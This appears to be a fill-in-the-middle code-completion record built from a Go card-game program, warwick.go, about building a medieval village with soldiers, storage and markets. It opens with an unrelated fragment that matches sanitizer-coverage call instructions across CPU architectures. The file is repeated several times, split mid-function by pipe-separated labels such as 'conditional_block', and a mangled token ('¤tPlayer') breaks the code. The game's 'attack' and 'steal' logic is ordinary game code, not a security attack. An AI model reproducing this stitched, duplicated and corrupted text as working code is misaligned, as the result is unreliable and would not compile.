return strings.TrimLeft(filepath.Clean(path), "/\\"), filename
}
func archCallInsn(target *targets.Target) ([][]byte, [][]byte) {
callName := [][]byte{[]byte(" <__sanitizer_cov_trace_pc>")}
switch target.Arch {
case targets.I386:
// c1000102: call c10001f0 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tcall ")}, callName
case targets.ARM64:
// ffff0000080d9cc0: bl ffff00000820f478 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbl\t")}, callName
case targets.ARM:
// 8010252c: bl 801c3280 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbl\t")}, callName
case targets.PPC64LE:
// c00000000006d904: bl c000000000350780 <.__sanitizer_cov_trace_pc>
// This is only known to occur in the test:
// 838: bl 824 <__sanitizer_cov_trace_pc+0x8>
// This occurs on PPC64LE:
// c0000000001c21a8: bl c0000000002df4a0 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbl ")}, [][]byte{
[]byte("<__sanitizer_cov_trace_pc>"),
[]byte("<__sanitizer_cov_trace_pc+0x8>"),
[]byte(" <.__sanitizer_cov_trace_pc>"),
}
case targets.MIPS64LE:
// ffffffff80100420: jal ffffffff80205880 <__sanitizer_cov_trace_pc>
// This is only known to occur in the test:
// b58: bal b30 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tjal\t"), []byte("\tbal\t")}, callName
case targets.S390x:
// 1001de: brasl %r14,2bc090 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbrasl\t")}, callName
case targets.RiscV64:
// ffffffe000200018: jal ra,ffffffe0002935b0 <__sanitizer_cov_trace_pc>
// ffffffe0000010da: jalr 1242(ra) # ffffffe0002935b0 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tjal\t"), []byte("\tjalr\t")}, callName
default:
panic(fmt.Sprintf("unknown arch %q", target.Arch))
}
}
| {
break
} | conditional_block |
warwick.go | /*
You are building a medieval village. You win by having the most Victory Points (VP), which you get by building
particular buildings. You build by discarding cards. The game is over when one player has built one
of each kind of building (and his opponent gets one more turn), or when the deck runs out.
Buildings:
There are 9 different kinds of building: Civic, Defensive, School, Military, Manufacturing, Supply, Market, Farm and Storage.
Each gives you additional powers. Details are below. There are 2 of each building in the deck.
Soldiers:
You can also recruit a Soldier card, but only up to the level of your current Military building. Like a building, you must
discard as many cards as the level of the soldier, unless you have a farm, which reduces the cost of recruiting Soldiers.
Soldiers can be used to attack the opponent. By discarding a soldier, you may take a card of equal value from your opponent.
If they have a defensive building, you must take the defensive building, and you may only take it if it is of equal or
lesser value.
Additionally, soldiers may be used for defense. They subtract their value from the value of the attacking soldier. If they
have a greater value, both attacking and defending soldiers are discarded. This is optional, you may choose to save your
soldier for attack.
Like buildings, soldiers may be upgraded, but not above the level of the military building.
Storage:
There are 4 spots on the board which can be used for storage, but only if you build the Storage building. You may store as many
cards as the value of the storage building. Cards put into Storage may only be built, they may not be discarded or trashed.
When you build a storage building, the storage slots will be filled, but if you build one of those cards, you can use that
spot to put a card from your hand. If you upgrade your storage, you may be able to fill empty spots from the deck. If the
opponents soldier attacks you and takes your Storage building, he also gets everything you have in storage!
Storage reconsidered:
Level 1 store one card, Level 2: + may build the stored card, Level 3: + may spend the stored card, Level 4: +1 storage spot
Storage reconsidered: Level 1 store one card, Level 2: + may build the stored card, Level 3: + may spend the stored card, Level 4: +1 storage spot
re2considered: 1: store card on table, 2: store 2nd card, 3: can move card back into hand, 4: fill any open storage spots at the time you build this card
re3considered: with each level, you open a spot that must be immediately filled from the draw, discard or hand
re4considered: 1: open a spot that may be immediately filled from the draw, discard or hand, 2: refill that spot, 3: add another, 4: refill both
Discard vs. Trash
There are two face up piles where cards go after they're used. When building, cards go into the discard. The Market buildings
allow you to draw from the discard pile (you must draw from the top of the pile. You may not look through the pile). When
using the Market buildings you may be able to trash cards to draw cards--cards that go into the trash may never be retrieved.
Soldiers go into the trash when they're used.
Turn order:
1. Build or Upgrade
2. Attack (optional, if Soldier recruited)
3. Store (optional, if Storage built)
4. Trash (optional, if Market built)
5. Hand limit is 5, draw up to 2, or discard
- or -
Trash all cards in hand, and draw the number trashed.
Building and Upgrading:
To build a level 3 building, you need to discard 3 cards. Buildings are built using wood, metal, or stone.
There are buildings that make other buildings made of certain materials cheaper to build. For instance, an Exchange (made of wood)
costs 3, but if you have a Carpentry, it will only cost you 2. If you have a Carpentry and a Sawmill, it will only cost you 1!
Buildings can also be upgraded. If you have a building of one level (say level 1), you can lay the building
of level 2 on top of it (but not the building of level 3 or 4!). That counts as a build, but doesn't cost you
anything.
To start:
Each player gets 5 cards.
*/
package main
import (
"fmt"
"math/rand"
"time"
"github.com/chrislunt/warwick/card"
"github.com/chrislunt/warwick/player"
)
var logLevel = 2
func log(level int, message string) {
if logLevel >= level {
fmt.Println(message);
}
}
func turnToPhase(turn int) (phase int) {
if turn > 6 {
phase = 2
} else if turn > 3 {
phase = 1
} else {
phase = 0
}
return
}
func store(storePower int, stock *card.Hand, discardPile *card.Hand, player *player.Player, phase int) {
var topSpot int
switch {
case storePower == 1 || storePower == 2:
// the player may choose from hand, discard or stock to fill the storage
// if the spot is open, you may refill it
topSpot = 0
case storePower == 3 || storePower == 4:
// a second storage spot opens, fill from stock, discard or hand
// for a 4, refill either open storage spots
topSpot = 1
}
for spot := 0; spot <= topSpot; spot++ {
if (*player).Tableau.Storage[spot] == nil {
storeCard := (*player).ChooseStore(stock, discardPile, phase)
log(1, fmt.Sprintf("Stored in storage %d: %s", spot, storeCard))
(*player).Tableau.Storage[spot] = storeCard
}
}
}
func buildStock() (stock card.Hand, stockSize int) {
rand.Seed( time.Now().UTC().UnixNano() )
// double the deck. This is the canonical reference of all cards.
var allCards = append(card.Deck[:], card.Deck[:]...)
stockSize = len(allCards)
// the stock, which can shrink, is a reference to all cards
stock.Cards = make([]*card.Card, stockSize)
stock.PullPos = stockSize - 1 // the position representing the current position to draw from
/* There are two ways we could randomize, one would be randomize the stock and keep a pointer of where we currently are,
which has an up-front randomization cost, but all subsequent pulls are cheap.
*/
// TODO make this a parameter
testStockId := -1
var permutation []int
if testStockId != -1 {
/* rather than having to specify the whole deck, I allow you to only specify the top of the deck */
fillSize := stockSize - len(card.TestStock[testStockId])
fillOut := rand.Perm(fillSize)
// for easier reading I specify the TestStock in reverse order, so get it ready to go on top
s := card.TestStock[testStockId]
for i, j := 0, len(s)-1; i < j; i, j = i+1, j-1 {
s[i], s[j] = s[j], s[i]
}
permutation = append(fillOut[0:fillSize], card.TestStock[testStockId]...);
} else {
permutation = rand.Perm(stockSize)
}
for i, v := range permutation {
stock.Cards[i] = &allCards[v]
}
return
}
func main() | {
stock, stockSize := buildStock()
var discardPile card.Hand
discardPile.Cards = make([]*card.Card, stockSize)
discardPile.PullPos = -1
var trash card.Hand
trash.Cards = make([]*card.Card, stockSize)
// trash is never pulled from, so no pull position
players := make([]player.Player, 2);
// set up rules about where you can get cards from for different actions
legalBuildFrom := map[int] bool{
player.FromHand: true,
player.FromStorage: true,
player.FromStock: false,
player.FromDiscard: false,
}
// initialize the players
for id := range players {
players[id].Hand = &card.Hand{}
players[id].Hand.Limit = 5
players[id].Hand.Max = 7
// create the hand with an extra 2 slots beyond the limit, which could happen
// if you use a soldier and then do an exchange
players[id].Hand.Cards = make([]*card.Card, players[id].Hand.Max)
// do the initial draw of 5 cards
stock.RandomPull(5, players[id].Hand)
// initize the Tableaus. The Tableau is a map indexed by a card type constant
// the map points to a small hand which is the potential stack of cards as someone upgrades
// there are 10 types of cards, plus 2 storage spots so each slot must be initialized
players[id].Tableau = &card.Tableau{}
players[id].Tableau.Stack = make(map[int] *card.Hand)
players[id].Tableau.Discounts = make([]int, 4)
players[id].Tableau.BuildBonus = 0
players[id].Tableau.AttackBonus = 0
players[id].Tableau.Storage = make([] *card.Card, 2)
players[id].Human = false
players[id].State = "Turn 1:\n"
// the player strategy should be loaded from somewhere. For now, set it all to 32
// instead of 1 value per turn, do 3 columns for beginning, middle and end.
// Value can be set by cost to start with. Value may be adjusted by changes in cost.
// value could be affected at time of spend by what may be discarded as well.
players[id].Strategy = make([][][]int, 3)
for phase := 0; phase <= 2; phase++ {
players[id].Strategy[phase] = make([][]int, 10)
for kind := 0; kind <= 9; kind++ {
players[id].Strategy[phase][kind] = make([]int, 5)
for cost := 1; cost <= 4; cost++ {
players[id].Strategy[phase][kind][cost] = cost * 16 - 1
}
}
}
}
// TODO: this should be an input parameter
players[0].Human = true
turnLimit := 0 // you can use this to cut a game short for dev purposes
turnCount := 0
gameOver := false
// play until the deck runs out
// or until the first player fills everything in their table (soldier doesn't matter)
for (stock.PullPos > -1) && ((turnLimit == 0) || (turnCount < turnLimit)) && !gameOver {
turnCount++
phase := turnToPhase(turnCount)
// for safety
// if you can't build any of the cards in your hand (because those positions are filled), you can get stuck
if turnCount > 29 {
fmt.Println("The game went to 30 turns--ending as a safety")
gameOver = true
}
// turns
var opponent player.Player
for id, currentPlayer := range players {
if id == 0 {
opponent = players[1]
} else {
opponent = players[0]
}
// we keep track of messages to send to the Human player
if opponent.Human {
players[0].State = fmt.Sprintf("Turn: %d\n", turnCount + 2)
}
// if we're coming back to this player and they already have 9 cards, it's time to stop
if currentPlayer.Tableau.Fill == 9 {
gameOver = true
break;
// there is an error here in that if player 1 goes out first, player 0 doesn't get another play
}
// turn order:
// 1. Build
// 2. Attack
// 3. Trash (with Market)
// 4. Draw up to 5 OR discard down to 5
// determine card to build, cost
// determine discards
// do build
// log(2, fmt.Sprintf("Player %d hand: %s", id, currentPlayer.Hand))
// log(2, fmt.Sprintf("Player %d Tableau: %s", id, currentPlayer.Tableau))
builds := 0
// we check it each time, since if you build the card, you get to use it immediately
for builds < (currentPlayer.Tableau.BuildBonus + 1) {
buildPos, cost, upgrade := currentPlayer.PlayerChooses(legalBuildFrom, phase)
var discards []player.Pos
if buildPos.From != player.NoCard {
log(1, fmt.Sprintf("Player %d builds %s for %d", id, currentPlayer.CardByPos(buildPos), cost))
if cost > 0 {
discards = currentPlayer.ChooseDiscards(buildPos, cost, phase)
if logLevel > 1 {
fmt.Println("Player", id, "discards:")
for _, pos := range discards {
fmt.Println(currentPlayer.CardByPos(pos))
}
}
}
kind := currentPlayer.CardByPos(buildPos).Kind
cardValue := currentPlayer.CardByPos(buildPos).Cost
currentPlayer.Build(buildPos, discards, &discardPile, upgrade)
// if it's storage, you get a chance to place a card
if kind == card.Storage {
store(cardValue, &stock, &discardPile, ¤tPlayer, phase);
}
log(2, fmt.Sprintf("currentPlayer %d has %d cards left", id, currentPlayer.Hand.Count))
builds++
} else {
break;
}
}
// When they don't build, and they have cards, check if they'd like to trash and redraw
if builds == 0 {
preResetCount := currentPlayer.Hand.Count
if (currentPlayer.Human && preResetCount > 0 && currentPlayer.HumanWantsRedraw()) || (currentPlayer.Hand.Count == currentPlayer.Hand.Limit) {
// if the computer player can't build, but they have a full hand, they will get stuck. Invoke the hand reset rule
currentPlayer.Hand.Reset()
stock.RandomPull(preResetCount, players[id].Hand)
fmt.Println("Player", id, "dumps their hand and redraws")
// if you recycle your hand, you don't get to do any builds, attacks, exchanges
continue;
}
}
// ------ Attack --------- //
steal := currentPlayer.ChooseAttack(opponent, phase) // steal is a card kind
if steal != -1 {
// log(1, fmt.Sprintf("Player %d uses %s and takes opponent's %s", id, currentPlayer.TopCard(card.Soldiers), opponent.TopCard(steal)))
if opponent.Human{
players[0].State += fmt.Sprintf("ALERT: Opponent used a %s to take your %s\n", currentPlayer.TopCard(card.Soldiers), opponent.TopCard(steal))
}
opponent.Tableau.RemoveTop(steal, currentPlayer.Hand)
// then loose your attack card
currentPlayer.Tableau.RemoveTop(card.Soldiers, &trash) // TODO: remove to trash, test if it works
}
// ------- TRASH --------- //
cardsTrashed := 0
// TrashBonus measures the amount of cards you can trash in order to draw a new one
if currentPlayer.Tableau.TrashBonus > 0 && currentPlayer.Hand.Count > 0 {
trashPoses := currentPlayer.ChooseTrash(phase)
cardsTrashed = currentPlayer.TrashCards(trashPoses, &trash)
}
// you must trash card to get the draw bonus under the current rules
if (currentPlayer.Tableau.DrawBonus > 0) && (cardsTrashed > 0) {
stock.RandomPull(currentPlayer.Tableau.DrawBonus, players[id].Hand)
log(1, fmt.Sprintf("Player %d bonus draws %d", id, currentPlayer.Tableau.DrawBonus))
}
// ------- DRAW --------- //
// see how many open spots there are in the hand. This may not run at all
currentPlayer.Draw(&discardPile, &stock, phase)
// ------- DISCARD --------- //
// TODO: allow player to choose discard
for currentPlayer.Hand.Count > currentPlayer.Hand.Limit {
fmt.Println("=================== Player", id, "has", currentPlayer.Hand.Count, "cards =================");
trashPos, _ := currentPlayer.LowestValueCard(phase, nil)
currentPlayer.Hand.RemoveCard(trashPos.Index, &trash)
}
// if a human is playing record the state to share with them at the beginning of their turn
// this assumes the human always goes first
if opponent.Human {
players[0].State += fmt.Sprintf("Opponent Tableau:\n%s\n", currentPlayer.Tableau)
players[0].State += fmt.Sprintf("Your Tableau:\n%s\n", opponent.Tableau)
}
}
fmt.Println("----END OF TURN----")
}
// determine the winner
if logLevel > 0 {
vp := make([]int, 2)
for id, currentPlayer := range players {
fmt.Println("Player", id, "Tableau: ", currentPlayer.Tableau)
vp[id] = currentPlayer.VictoryPoints()
}
fmt.Println("Player 0", vp[0], "-", vp[1], "Player 1")
if vp[0] == vp[1] {
fmt.Println("Tie game")
} else if vp[0] < vp[1] {
fmt.Println("Player 1 wins!")
} else {
fmt.Println("Player 0 wins!")
}
}
} | identifier_body | |
warwick.go | /*
You are building a medieval village. You win by having the most Victory Points (VP), which you get by building
particular buildings. You build by discarding cards. The game is over when one player has built one
of each kind of building (and his opponent gets one more turn), or when the deck runs out.
Buildings:
There are 9 different kinds of building: Civic, Defensive, School, Military, Manufacturing, Supply, Market, Farm and Storage.
Each gives you additional powers. Details are below. There are 2 of each building in the deck.
Soldiers:
You can also recruit a Soldier card, but only up to the level of your current Military building. Like a building, you must
discard as many cards as the level of the soldier, unless you have a farm, which reduces the cost of recruiting Soldiers.
Soldiers can be used to attack the opponent. By discarding a soldier, you may take a card of equal value from your opponent.
If they have a defensive building, you must take the defensive building, and you may only take it if it is of equal or
lesser value.
Additionally, soldiers may be used for defense. They subtract their value from the value of the attacking soldier. If they
have a greater value, both attacking and defending soldiers are discarded. This is optional, you may choose to save your
soldier for attack.
Like buildings, soldiers may be upgraded, but not above the level of the military building.
Storage:
There are 4 spots on the board which can be used for storage, but only if you build the Storage building. You may store as many
cards as the value of the storage building. Cards put into Storage may only be built, they may not be discarded or trashed.
When you build a storage building, the storage slots will be filled, but if you build one of those cards, you can use that
spot to put a card from your hand. If you upgrade your storage, you may be able to fill empty spots from the deck. If the
opponents soldier attacks you and takes your Storage building, he also gets everything you have in storage!
Storage reconsidered:
Level 1 store one card, Level 2: + may build the stored card, Level 3: + may spend the stored card, Level 4: +1 storage spot
Storage reconsidered: Level 1 store one card, Level 2: + may build the stored card, Level 3: + may spend the stored card, Level 4: +1 storage spot
re2considered: 1: store card on table, 2: store 2nd card, 3: can move card back into hand, 4: fill any open storage spots at the time you build this card
re3considered: with each level, you open a spot that must be immediately filled from the draw, discard or hand
re4considered: 1: open a spot that may be immediately filled from the draw, discard or hand, 2: refill that spot, 3: add another, 4: refill both
Discard vs. Trash
There are two face up piles where cards go after they're used. When building, cards go into the discard. The Market buildings
allow you to draw from the discard pile (you must draw from the top of the pile. You may not look through the pile). When
using the Market buildings you may be able to trash cards to draw cards--cards that go into the trash may never be retrieved.
Soldiers go into the trash when they're used.
Turn order:
1. Build or Upgrade
2. Attack (optional, if Soldier recruited)
3. Store (optional, if Storage built)
4. Trash (optional, if Market built)
5. Hand limit is 5, draw up to 2, or discard
- or -
Trash all cards in hand, and draw the number trashed.
Building and Upgrading:
To build a level 3 building, you need to discard 3 cards. Buildings are built using wood, metal, or stone.
There are buildings that make other buildings made of certain materials cheaper to build. For instance, an Exchange (made of wood)
costs 3, but if you have a Carpentry, it will only cost you 2. If you have a Carpentry and a Sawmill, it will only cost you 1!
Buildings can also be upgraded. If you have a building of one level (say level 1), you can lay the building
of level 2 on top of it (but not the building of level 3 or 4!). That counts as a build, but doesn't cost you
anything.
To start:
Each player gets 5 cards.
*/
package main
import (
"fmt"
"math/rand"
"time"
"github.com/chrislunt/warwick/card"
"github.com/chrislunt/warwick/player"
)
var logLevel = 2
func log(level int, message string) {
if logLevel >= level {
fmt.Println(message);
}
}
func turnToPhase(turn int) (phase int) {
if turn > 6 {
phase = 2
} else if turn > 3 {
phase = 1
} else {
phase = 0
}
return
}
func store(storePower int, stock *card.Hand, discardPile *card.Hand, player *player.Player, phase int) {
var topSpot int
switch {
case storePower == 1 || storePower == 2:
// the player may choose from hand, discard or stock to fill the storage
// if the spot is open, you may refill it
topSpot = 0
case storePower == 3 || storePower == 4:
// a second storage spot opens, fill from stock, discard or hand
// for a 4, refill either open storage spots
topSpot = 1
}
for spot := 0; spot <= topSpot; spot++ {
if (*player).Tableau.Storage[spot] == nil {
storeCard := (*player).ChooseStore(stock, discardPile, phase)
log(1, fmt.Sprintf("Stored in storage %d: %s", spot, storeCard))
(*player).Tableau.Storage[spot] = storeCard
}
}
}
func buildStock() (stock card.Hand, stockSize int) {
rand.Seed( time.Now().UTC().UnixNano() )
// double the deck. This is the canonical reference of all cards.
var allCards = append(card.Deck[:], card.Deck[:]...)
stockSize = len(allCards)
// the stock, which can shrink, is a reference to all cards
stock.Cards = make([]*card.Card, stockSize)
stock.PullPos = stockSize - 1 // the position representing the current position to draw from
/* There are two ways we could randomize, one would be randomize the stock and keep a pointer of where we currently are,
which has an up-front randomization cost, but all subsequent pulls are cheap.
*/
// TODO make this a parameter
testStockId := -1
var permutation []int
if testStockId != -1 {
/* rather than having to specify the whole deck, I allow you to only specify the top of the deck */
fillSize := stockSize - len(card.TestStock[testStockId])
fillOut := rand.Perm(fillSize)
// for easier reading I specify the TestStock in reverse order, so get it ready to go on top
s := card.TestStock[testStockId]
for i, j := 0, len(s)-1; i < j; i, j = i+1, j-1 {
s[i], s[j] = s[j], s[i]
}
permutation = append(fillOut[0:fillSize], card.TestStock[testStockId]...);
} else {
permutation = rand.Perm(stockSize)
}
for i, v := range permutation {
stock.Cards[i] = &allCards[v]
}
return
}
func main() {
stock, stockSize := buildStock()
var discardPile card.Hand
discardPile.Cards = make([]*card.Card, stockSize)
discardPile.PullPos = -1
var trash card.Hand
trash.Cards = make([]*card.Card, stockSize)
// trash is never pulled from, so no pull position
players := make([]player.Player, 2);
// set up rules about where you can get cards from for different actions
legalBuildFrom := map[int] bool{
player.FromHand: true,
player.FromStorage: true,
player.FromStock: false,
player.FromDiscard: false,
}
// initialize the players
for id := range players {
players[id].Hand = &card.Hand{}
players[id].Hand.Limit = 5
players[id].Hand.Max = 7
// create the hand with an extra 2 slots beyond the limit, which could happen
// if you use a soldier and then do an exchange
players[id].Hand.Cards = make([]*card.Card, players[id].Hand.Max)
// do the initial draw of 5 cards
stock.RandomPull(5, players[id].Hand)
// initize the Tableaus. The Tableau is a map indexed by a card type constant
// the map points to a small hand which is the potential stack of cards as someone upgrades
// there are 10 types of cards, plus 2 storage spots so each slot must be initialized
players[id].Tableau = &card.Tableau{}
players[id].Tableau.Stack = make(map[int] *card.Hand)
players[id].Tableau.Discounts = make([]int, 4)
players[id].Tableau.BuildBonus = 0
players[id].Tableau.AttackBonus = 0
players[id].Tableau.Storage = make([] *card.Card, 2)
players[id].Human = false
players[id].State = "Turn 1:\n"
// the player strategy should be loaded from somewhere. For now, set it all to 32
// instead of 1 value per turn, do 3 columns for beginning, middle and end.
// Value can be set by cost to start with. Value may be adjusted by changes in cost.
// value could be affected at time of spend by what may be discarded as well.
players[id].Strategy = make([][][]int, 3)
for phase := 0; phase <= 2; phase++ {
players[id].Strategy[phase] = make([][]int, 10)
for kind := 0; kind <= 9; kind++ {
players[id].Strategy[phase][kind] = make([]int, 5)
for cost := 1; cost <= 4; cost++ {
players[id].Strategy[phase][kind][cost] = cost * 16 - 1
}
}
}
}
// TODO: this should be an input parameter
players[0].Human = true
turnLimit := 0 // you can use this to cut a game short for dev purposes
turnCount := 0
gameOver := false
// play until the deck runs out
// or until the first player fills everything in their table (soldier doesn't matter)
for (stock.PullPos > -1) && ((turnLimit == 0) || (turnCount < turnLimit)) && !gameOver {
turnCount++
phase := turnToPhase(turnCount)
// for safety
// if you can't build any of the cards in your hand (because those positions are filled), you can get stuck
if turnCount > 29 {
fmt.Println("The game went to 30 turns--ending as a safety")
gameOver = true
}
// turns
var opponent player.Player
for id, currentPlayer := range players {
if id == 0 {
opponent = players[1]
} else {
opponent = players[0]
}
// we keep track of messages to send to the Human player
if opponent.Human {
players[0].State = fmt.Sprintf("Turn: %d\n", turnCount + 2)
}
// if we're coming back to this player and they already have 9 cards, it's time to stop
if currentPlayer.Tableau.Fill == 9 {
gameOver = true
break;
// there is an error here in that if player 1 goes out first, player 0 doesn't get another play
}
// turn order:
// 1. Build
// 2. Attack
// 3. Trash (with Market)
// 4. Draw up to 5 OR discard down to 5
// determine card to build, cost
// determine discards
// do build
// log(2, fmt.Sprintf("Player %d hand: %s", id, currentPlayer.Hand))
// log(2, fmt.Sprintf("Player %d Tableau: %s", id, currentPlayer.Tableau))
builds := 0
// we check it each time, since if you build the card, you get to use it immediately
for builds < (currentPlayer.Tableau.BuildBonus + 1) {
buildPos, cost, upgrade := currentPlayer.PlayerChooses(legalBuildFrom, phase)
var discards []player.Pos
if buildPos.From != player.NoCard {
log(1, fmt.Sprintf("Player %d builds %s for %d", id, currentPlayer.CardByPos(buildPos), cost))
if cost > 0 {
discards = currentPlayer.ChooseDiscards(buildPos, cost, phase)
if logLevel > 1 {
fmt.Println("Player", id, "discards:")
for _, pos := range discards {
fmt.Println(currentPlayer.CardByPos(pos))
}
}
}
kind := currentPlayer.CardByPos(buildPos).Kind
cardValue := currentPlayer.CardByPos(buildPos).Cost
currentPlayer.Build(buildPos, discards, &discardPile, upgrade)
// if it's storage, you get a chance to place a card
if kind == card.Storage {
store(cardValue, &stock, &discardPile, ¤tPlayer, phase);
}
log(2, fmt.Sprintf("currentPlayer %d has %d cards left", id, currentPlayer.Hand.Count))
builds++
} else {
break;
}
}
// When they don't build, and they have cards, check if they'd like to trash and redraw
if builds == 0 {
preResetCount := currentPlayer.Hand.Count
if (currentPlayer.Human && preResetCount > 0 && currentPlayer.HumanWantsRedraw()) || (currentPlayer.Hand.Count == currentPlayer.Hand.Limit) {
// if the computer player can't build, but they have a full hand, they will get stuck. Invoke the hand reset rule
currentPlayer.Hand.Reset()
stock.RandomPull(preResetCount, players[id].Hand)
fmt.Println("Player", id, "dumps their hand and redraws")
// if you recycle your hand, you don't get to do any builds, attacks, exchanges
continue;
}
}
// ------ Attack --------- //
steal := currentPlayer.ChooseAttack(opponent, phase) // steal is a card kind
if steal != -1 |
// ------- TRASH --------- //
cardsTrashed := 0
// TrashBonus measures the amount of cards you can trash in order to draw a new one
if currentPlayer.Tableau.TrashBonus > 0 && currentPlayer.Hand.Count > 0 {
trashPoses := currentPlayer.ChooseTrash(phase)
cardsTrashed = currentPlayer.TrashCards(trashPoses, &trash)
}
// you must trash card to get the draw bonus under the current rules
if (currentPlayer.Tableau.DrawBonus > 0) && (cardsTrashed > 0) {
stock.RandomPull(currentPlayer.Tableau.DrawBonus, players[id].Hand)
log(1, fmt.Sprintf("Player %d bonus draws %d", id, currentPlayer.Tableau.DrawBonus))
}
// ------- DRAW --------- //
// see how many open spots there are in the hand. This may not run at all
currentPlayer.Draw(&discardPile, &stock, phase)
// ------- DISCARD --------- //
// TODO: allow player to choose discard
for currentPlayer.Hand.Count > currentPlayer.Hand.Limit {
fmt.Println("=================== Player", id, "has", currentPlayer.Hand.Count, "cards =================");
trashPos, _ := currentPlayer.LowestValueCard(phase, nil)
currentPlayer.Hand.RemoveCard(trashPos.Index, &trash)
}
// if a human is playing record the state to share with them at the beginning of their turn
// this assumes the human always goes first
if opponent.Human {
players[0].State += fmt.Sprintf("Opponent Tableau:\n%s\n", currentPlayer.Tableau)
players[0].State += fmt.Sprintf("Your Tableau:\n%s\n", opponent.Tableau)
}
}
fmt.Println("----END OF TURN----")
}
// determine the winner
if logLevel > 0 {
vp := make([]int, 2)
for id, currentPlayer := range players {
fmt.Println("Player", id, "Tableau: ", currentPlayer.Tableau)
vp[id] = currentPlayer.VictoryPoints()
}
fmt.Println("Player 0", vp[0], "-", vp[1], "Player 1")
if vp[0] == vp[1] {
fmt.Println("Tie game")
} else if vp[0] < vp[1] {
fmt.Println("Player 1 wins!")
} else {
fmt.Println("Player 0 wins!")
}
}
} | {
// log(1, fmt.Sprintf("Player %d uses %s and takes opponent's %s", id, currentPlayer.TopCard(card.Soldiers), opponent.TopCard(steal)))
if opponent.Human{
players[0].State += fmt.Sprintf("ALERT: Opponent used a %s to take your %s\n", currentPlayer.TopCard(card.Soldiers), opponent.TopCard(steal))
}
opponent.Tableau.RemoveTop(steal, currentPlayer.Hand)
// then loose your attack card
currentPlayer.Tableau.RemoveTop(card.Soldiers, &trash) // TODO: remove to trash, test if it works
} | conditional_block |
warwick.go | /*
You are building a medieval village. You win by having the most Victory Points (VP), which you get by building
particular buildings. You build by discarding cards. The game is over when one player has built one
of each kind of building (and his opponent gets one more turn), or when the deck runs out.
Buildings:
There are 9 different kinds of building: Civic, Defensive, School, Military, Manufacturing, Supply, Market, Farm and Storage.
Each gives you additional powers. Details are below. There are 2 of each building in the deck.
Soldiers:
You can also recruit a Soldier card, but only up to the level of your current Military building. Like a building, you must
discard as many cards as the level of the soldier, unless you have a farm, which reduces the cost of recruiting Soldiers.
Soldiers can be used to attack the opponent. By discarding a soldier, you may take a card of equal value from your opponent.
If they have a defensive building, you must take the defensive building, and you may only take it if it is of equal or
lesser value.
Additionally, soldiers may be used for defense. They subtract their value from the value of the attacking soldier. If they
have a greater value, both attacking and defending soldiers are discarded. This is optional, you may choose to save your
soldier for attack.
Like buildings, soldiers may be upgraded, but not above the level of the military building.
Storage:
There are 4 spots on the board which can be used for storage, but only if you build the Storage building. You may store as many
cards as the value of the storage building. Cards put into Storage may only be built, they may not be discarded or trashed.
When you build a storage building, the storage slots will be filled, but if you build one of those cards, you can use that
spot to put a card from your hand. If you upgrade your storage, you may be able to fill empty spots from the deck. If the
opponents soldier attacks you and takes your Storage building, he also gets everything you have in storage!
Storage reconsidered:
Level 1 store one card, Level 2: + may build the stored card, Level 3: + may spend the stored card, Level 4: +1 storage spot
Storage reconsidered: Level 1 store one card, Level 2: + may build the stored card, Level 3: + may spend the stored card, Level 4: +1 storage spot
re2considered: 1: store card on table, 2: store 2nd card, 3: can move card back into hand, 4: fill any open storage spots at the time you build this card
re3considered: with each level, you open a spot that must be immediately filled from the draw, discard or hand
re4considered: 1: open a spot that may be immediately filled from the draw, discard or hand, 2: refill that spot, 3: add another, 4: refill both
Discard vs. Trash
There are two face up piles where cards go after they're used. When building, cards go into the discard. The Market buildings
allow you to draw from the discard pile (you must draw from the top of the pile. You may not look through the pile). When
using the Market buildings you may be able to trash cards to draw cards--cards that go into the trash may never be retrieved.
Soldiers go into the trash when they're used.
Turn order:
1. Build or Upgrade
2. Attack (optional, if Soldier recruited)
3. Store (optional, if Storage built)
4. Trash (optional, if Market built)
5. Hand limit is 5, draw up to 2, or discard
- or -
Trash all cards in hand, and draw the number trashed.
Building and Upgrading:
To build a level 3 building, you need to discard 3 cards. Buildings are built using wood, metal, or stone.
There are buildings that make other buildings made of certain materials cheaper to build. For instance, an Exchange (made of wood)
costs 3, but if you have a Carpentry, it will only cost you 2. If you have a Carpentry and a Sawmill, it will only cost you 1!
Buildings can also be upgraded. If you have a building of one level (say level 1), you can lay the building
of level 2 on top of it (but not the building of level 3 or 4!). That counts as a build, but doesn't cost you
anything.
To start:
Each player gets 5 cards.
*/
package main
import (
"fmt"
"math/rand"
"time"
"github.com/chrislunt/warwick/card"
"github.com/chrislunt/warwick/player"
)
var logLevel = 2
func log(level int, message string) {
if logLevel >= level {
fmt.Println(message);
}
}
func turnToPhase(turn int) (phase int) {
if turn > 6 {
phase = 2
} else if turn > 3 {
phase = 1
} else {
phase = 0
}
return
}
func | (storePower int, stock *card.Hand, discardPile *card.Hand, player *player.Player, phase int) {
var topSpot int
switch {
case storePower == 1 || storePower == 2:
// the player may choose from hand, discard or stock to fill the storage
// if the spot is open, you may refill it
topSpot = 0
case storePower == 3 || storePower == 4:
// a second storage spot opens, fill from stock, discard or hand
// for a 4, refill either open storage spots
topSpot = 1
}
for spot := 0; spot <= topSpot; spot++ {
if (*player).Tableau.Storage[spot] == nil {
storeCard := (*player).ChooseStore(stock, discardPile, phase)
log(1, fmt.Sprintf("Stored in storage %d: %s", spot, storeCard))
(*player).Tableau.Storage[spot] = storeCard
}
}
}
func buildStock() (stock card.Hand, stockSize int) {
rand.Seed( time.Now().UTC().UnixNano() )
// double the deck. This is the canonical reference of all cards.
var allCards = append(card.Deck[:], card.Deck[:]...)
stockSize = len(allCards)
// the stock, which can shrink, is a reference to all cards
stock.Cards = make([]*card.Card, stockSize)
stock.PullPos = stockSize - 1 // the position representing the current position to draw from
/* There are two ways we could randomize, one would be randomize the stock and keep a pointer of where we currently are,
which has an up-front randomization cost, but all subsequent pulls are cheap.
*/
// TODO make this a parameter
testStockId := -1
var permutation []int
if testStockId != -1 {
/* rather than having to specify the whole deck, I allow you to only specify the top of the deck */
fillSize := stockSize - len(card.TestStock[testStockId])
fillOut := rand.Perm(fillSize)
// for easier reading I specify the TestStock in reverse order, so get it ready to go on top
s := card.TestStock[testStockId]
for i, j := 0, len(s)-1; i < j; i, j = i+1, j-1 {
s[i], s[j] = s[j], s[i]
}
